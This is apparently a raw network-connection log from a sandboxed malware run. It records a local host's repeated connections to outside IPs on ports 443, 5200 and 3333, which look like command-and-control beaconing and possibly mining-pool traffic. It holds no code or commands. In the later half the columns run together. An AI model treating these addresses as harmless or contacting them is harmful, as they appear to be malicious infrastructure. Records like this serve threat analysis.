Dec 9, 2024 07:37:34.612623930 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.618199110 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.618215084 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.618271112 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.618279934 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.618319035 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.703175068 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.703192949 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.703299046 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.703320980 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.703361034 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.708594084 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.708611012 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.708673000 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.708681107 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.708717108 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.781673908 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.781691074 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.781739950 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.781755924 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.781790972 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.781810045 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.787096024 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.787111998 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.787158966 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.787167072 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.787194967 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.787209034 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.792540073 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.792555094 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.792613029 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.792623997 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.792659998 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.798472881 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.798487902 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.798533916 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.798554897 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.798569918 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.798592091 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.804470062 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.804486036 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.804544926 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.804553986 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.804594040 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.810295105 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.810314894 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.810353041 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.810367107 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.810389996 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.810409069 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.859491110 CET  5200         49739      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:34.895536900 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.895554066 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.895595074 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.895612001 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.895637035 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.895658970 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.901061058 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.901076078 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.901127100 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.901139975 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.901175976 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.912178993 CET  49739        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:34.994400024 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.994415045 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.994481087 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.994502068 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.994554996 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.999851942 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.999892950 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.999912024 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:34.999922037 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:34.999958992 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.005484104 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.005500078 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.005549908 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.005563974 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.005598068 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.011501074 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.011517048 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.011580944 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.011594057 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.011631012 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.016978025 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.016993999 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.017043114 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.017054081 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.017087936 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.017107010 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.022732019 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.022746086 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.022924900 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.022937059 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.022980928 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.087970972 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.087990999 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.088105917 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.088118076 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.088165998 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.093122959 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.093138933 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.093214035 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.093221903 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.093265057 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.186589003 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.186606884 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.186702967 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.186717033 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.186758995 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.192169905 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.192184925 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.192246914 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.192255020 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.192296028 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.197432041 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.197448015 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.197527885 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.197535038 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.197583914 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.203474998 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.203490973 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.203567028 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.203574896 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.203613997 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.205115080 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.205178022 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.205178976 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.205223083 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.205332041 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.205344915 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.205355883 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:35.205360889 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:35.288353920 CET  5200         49739      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:35.291269064 CET  49741        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:35.334858894 CET  49739        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:35.410599947 CET  5200         49741      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:35.410665035 CET  49741        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:35.410820007 CET  49741        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:35.530164957 CET  5200         49741      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:35.992120981 CET  5200         49739      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:36.037971020 CET  49739        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:36.612705946 CET  49742        3333       192.168.2.4      37.203.243.102
Dec 9, 2024 07:37:36.732007027 CET  3333         49742      37.203.243.102   192.168.2.4
Dec 9, 2024 07:37:36.734818935 CET  49742        3333       192.168.2.4      37.203.243.102
Dec 9, 2024 07:37:36.735104084 CET  49742        3333       192.168.2.4      37.203.243.102
Dec 9, 2024 07:37:36.854717016 CET  3333         49742      37.203.243.102   192.168.2.4
Dec 9, 2024 07:37:37.000585079 CET  5200         49739      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:37.052778006 CET  49739        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:37.263396978 CET  5200         49741      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:37.276014090 CET  49741        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:37.395323038 CET  5200         49741      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:37.765923977 CET  49743        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:37.765959024 CET  443          49743      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:37.766016006 CET  49743        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:37.781898975 CET  49743        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:37.781912088 CET  443          49743      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:37.972923994 CET  5200         49741      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:37.973434925 CET  49744        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:38.014493942 CET  5200         49739      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:38.022342920 CET  49741        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:38.067420959 CET  3333         49742      37.203.243.102   192.168.2.4
Dec 9, 2024 07:37:38.067471981 CET  3333         49742      37.203.243.102   192.168.2.4
Dec 9, 2024 07:37:38.067512035 CET  49742        3333       192.168.2.4      37.203.243.102
Dec 9, 2024 07:37:38.069214106 CET  49739        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:38.092715979 CET  5200         49744      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:38.092782974 CET  49744        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:38.092972994 CET  49744        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:38.212167025 CET  5200         49744      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:39.016165972 CET  5200         49739      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:39.069394112 CET  49739        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:39.981620073 CET  5200         49744      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:39.981787920 CET  49744        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:40.029051065 CET  5200         49739      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:40.069766998 CET  49739        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:40.101197958 CET  5200         49744      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:40.705007076 CET  5200         49744      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:40.705406904 CET  49745        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:40.756738901 CET  49744        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:40.824743986 CET  5200         49745      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:40.824892044 CET  49745        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:40.827923059 CET  49745        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:40.947174072 CET  5200         49745      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:41.042830944 CET  5200         49739      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:41.084867954 CET  49739        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:42.048832893 CET  5200         49739      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:42.100469112 CET  49739        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:42.677351952 CET  5200         49745      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:42.677542925 CET  49745        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:42.797506094 CET  5200         49745      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:43.059019089 CET  5200         49739      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:43.100524902 CET  49739        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:43.376009941 CET  5200         49745      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:43.376410961 CET  49746        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:43.428608894 CET  49745        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:43.495728970 CET  5200         49746      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:43.495923042 CET  49746        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:43.495961905 CET  49746        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:43.615292072 CET  5200         49746      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:44.065792084 CET  5200         49739      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:44.116188049 CET  49739        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:45.073162079 CET  5200         49739      185.157.162.216  192.168.2.4
Dec 9, 2024 07:37:45.116173983 CET  49739        5200       192.168.2.4      185.157.162.216
Dec 9, 2024 07:37:45.349483013 CET  5200         49746      185.157.162.216  192.168.2.4
                                                                                                          Dec 9, 2024 07:37:45.349803925 CET497465200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:45.469083071 CET520049746185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:46.071067095 CET520049746185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:46.071481943 CET497475200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:46.081002951 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:46.116115093 CET497465200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:46.131704092 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:46.190963984 CET520049747185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:46.191076040 CET497475200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:46.191236019 CET497475200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:46.310461044 CET520049747185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:47.093163967 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:47.147463083 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:48.063740969 CET520049747185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:48.064011097 CET497475200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:48.106477976 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:48.147433996 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:48.183306932 CET520049747185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:48.760601044 CET520049747185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:48.803643942 CET497475200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:49.125878096 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:49.178580046 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:50.134555101 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:50.178587914 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:51.155796051 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:51.209832907 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:52.165818930 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:52.209837914 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:53.171319008 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:53.225454092 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:54.177814007 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:54.225465059 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:55.179706097 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:55.225461006 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:56.194221020 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:56.241103888 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:57.206455946 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:57.256793976 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:58.211992979 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:58.256685972 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:59.216969013 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:59.256686926 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:00.225450993 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:00.272355080 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:01.237035036 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:01.287949085 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:02.247106075 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:02.287950039 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:03.274020910 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:03.319212914 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:04.268533945 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:04.319195986 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:05.278851032 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:05.319200039 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:05.335051060 CET49740443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:05.337716103 CET49764443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:05.337758064 CET44349764154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:05.337835073 CET49764443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:05.338721991 CET49764443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:05.338731050 CET44349764154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:06.282062054 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:06.334820032 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:07.306531906 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:07.351022005 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:08.321821928 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:08.366058111 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:09.302762032 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:09.350483894 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:10.300522089 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:10.350496054 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:11.307611942 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:11.350447893 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:12.307346106 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:12.350430965 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:13.331429005 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:13.381683111 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:14.316684008 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:14.366122961 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:15.330171108 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:15.381731987 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:16.349347115 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:16.397310972 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:17.358184099 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:17.412942886 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:18.361211061 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:18.412945032 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:19.377624989 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:19.428564072 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:20.389328003 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:20.444176912 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:21.392483950 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:21.444175959 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:21.855694056 CET44349743154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:21.855770111 CET49743443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:21.876833916 CET49743443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:38:21.876842976 CET44349743154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:38:21.976658106 CET497423333192.168.2.437.203.243.102
                                                                                                          Dec 9, 2024 07:38:21.976680994 CET497423333192.168.2.437.203.243.102
                                                                                                          Dec 9, 2024 07:38:22.411366940 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:22.459844112 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:23.408072948 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:23.459939003 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:24.413147926 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:24.460422039 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:25.425757885 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:25.475420952 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:26.439805031 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:26.491081953 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:27.102786064 CET498163333192.168.2.45.188.137.200
                                                                                                          Dec 9, 2024 07:38:27.222136021 CET3333498165.188.137.200192.168.2.4
                                                                                                          Dec 9, 2024 07:38:27.222206116 CET498163333192.168.2.45.188.137.200
                                                                                                          Dec 9, 2024 07:38:27.222549915 CET498163333192.168.2.45.188.137.200
                                                                                                          Dec 9, 2024 07:38:27.341809988 CET3333498165.188.137.200192.168.2.4
                                                                                                          Dec 9, 2024 07:38:27.449243069 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:27.491061926 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:28.457458973 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:38:28.506824017 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:38:28.552875042 CET3333498165.188.137.200192.168.2.4
                                                                                                          Dec 9, 2024 07:38:28.552941084 CET3333498165.188.137.200192.168.2.4
                                                                                                          Dec 9, 2024 07:38:28.552979946 CET498163333192.168.2.45.188.137.200
                                                                                                          Dec 9, 2024 07:38:28.554147005 CET498163333192.168.2.45.188.137.200
                                                                                                          Dec 9, 2024 07:38:28.673477888 CET3333498165.188.137.200192.168.2.4
                                                                                                          Dec 9, 2024 07:38:28.984510899 CET3333498165.188.137.200192.168.2.4
                                                                                                          Dec 9, 2024 07:38:29.037945032 CET498163333192.168.2.45.188.137.200
                                                                                                          Dec 9, 2024 07:38:29.220036983 CET3333498165.188.137.200192.168.2.4
                                                                                                          Dec 9, 2024 07:38:29.272392035 CET498163333192.168.2.45.188.137.200
                                                                                                          Dec 9, 2024 07:38:29.462943077 CET520049739185.157.162.216192.168.2.4
